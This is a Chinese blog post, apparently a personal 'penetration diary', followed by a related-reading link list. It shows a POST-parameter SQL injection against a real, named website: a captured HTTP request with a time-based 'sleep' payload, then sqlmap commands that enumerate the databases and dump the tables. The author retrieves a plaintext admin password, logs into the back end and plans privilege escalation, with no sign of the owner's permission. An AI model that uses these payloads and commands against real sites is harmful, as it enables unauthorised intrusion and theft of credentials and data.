zoukankan      html  css  js  c++  java
  • 渗透日记-POST注入

      今晚给一个网站做了一次入侵检测,首先进行信息刺探后,发现这个站有注入策略,所有页面都没法通过常规的注入,利用wvs扫描网站发现一个页面。

    这个页面直接暴露出了错误信息,看了一下url没有参数却爆出了错误,感觉post能注入,于是抓包修改header分析了一下

    Request
    POST /medresult.php HTTP/1.1
    Content-Length: 28
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Cookie: PHPSESSID=2ah1ottpdkcj0jgip9lgl54891
    Host: www.zgyijing.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
    Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
    Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
    Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
    Accept: */*
    
    lm=5 and sleep(2)

    发现这个页面存在SQL注入漏洞,还是POST类型的注入漏洞,防了GET注入但是没有防御POST注入,于是乎。。。跑一下sqlmap

    格式为:sqlmap -u http://www.xxxxx.com  --data "lm=1"

    发现确实是存在注入的,于是乎。。。 把表爆出来找关键的表

    格式:sqlmap -u http://www.xxxxx.com --data "lm=1" --dbs

      发现一个关键信息的表,这个站用的库就是 vps051,于是乎把vps051这个哭的表爆出来

    格式:sqlmap -u http://www.xxxxx.com --data "lm=1" -D vps051 --tables

      英语好点的同学应该猜测到管理员的表应该是master,爆出管理的表

      密码竟然是明文的,省去了破解的功夫,这下得到了管理的密码,登录网站后台

      接下来就可以考虑提权了。。

  • 相关阅读:
    (WPF)实现DataGrid中当某一列的值显示为密码样式
    利用双栈实现撤销与恢复逻辑
    WPF 中ContextMenu 在mvvm模式中的绑定问题
    WPF使用StringFormat绑定
    不注册调用COM组件
    再谈WPF绑定
    WPF的动态资源和静态资源
    MDI窗体(Winform)
    mysql 查询json字符串中符合条件的值
    phpstudy 导入sql到phpmyadmin中sql过大导致失败解决办法
  • 原文地址:https://www.cnblogs.com/ximotao/p/5789464.html
Copyright © 2011-2022 走看看